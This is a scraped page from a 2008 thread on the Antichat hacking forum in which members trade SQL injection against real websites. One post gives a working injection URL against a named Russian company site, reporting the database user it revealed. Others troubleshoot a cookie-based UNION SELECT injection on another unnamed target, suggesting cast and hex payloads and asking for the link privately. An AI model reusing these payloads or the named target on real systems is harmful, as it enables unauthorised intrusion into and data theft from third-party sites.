HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4181  
Старый 18.12.2008, 09:20
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

u36a
http://kapstroytelecom.ru/?pid=1+or+1=(select+system_user)
user: televik
 
Ответить с цитированием

  #4182  
Старый 18.12.2008, 11:49
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Подскажите как победить это:
1' union select 1,version(),3
Inconvertible type mismatch between SourceColumn 'LeadDate' of Byte[] and the DataColumn 'LeadDate' of DateTime.
Сконвертить надо? Каким образом?
К примеру дулал так - 1' union select 1,cast(version()+as+datetime),3
В этом случае запрос проходит нормально, только вот результат не выводится...

Последний раз редактировалось SHS; 18.12.2008 в 12:30..
 
Ответить с цитированием

  #4183  
Старый 18.12.2008, 13:54
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

ну так не в datetime а в byte, попробуй не числовые данные конвертировать например из table_name

Последний раз редактировалось l1ght; 18.12.2008 в 14:00..
 
Ответить с цитированием

  #4184  
Старый 18.12.2008, 13:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

1' union select 1,unhex(hex(version())),3
 
Ответить с цитированием

  #4185  
Старый 18.12.2008, 14:46
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Не помогло
 
Ответить с цитированием

  #4186  
Старый 18.12.2008, 14:51
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

ссылку кинь в PM
 
Ответить с цитированием

  #4187  
Старый 18.12.2008, 15:15
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

эта инъекция в куках.
 
Ответить с цитированием

  #4188  
Старый 18.12.2008, 15:37
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

http://social.msdn.microsoft.com/forums/en-US/winformsdatacontrols/thread/bf35e9f0-3b0f-428d-8cbc-9256e7351ca4/

Цитата:
Yes ,it not list System.Byte[] . But you can add "[ ]"after "System.Byte" manually, it goes well here. Hope it helps.
 
Ответить с цитированием

  #4189  
Старый 18.12.2008, 16:18
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

какой hex, какие [] вводимые данные должны быть в формате типа данных колонки)

/add скинь сцылко в пм

Последний раз редактировалось l1ght; 18.12.2008 в 16:36..
 
Ответить с цитированием

  #4190  
Старый 18.12.2008, 16:24
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Хм получается что не будет вывода?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...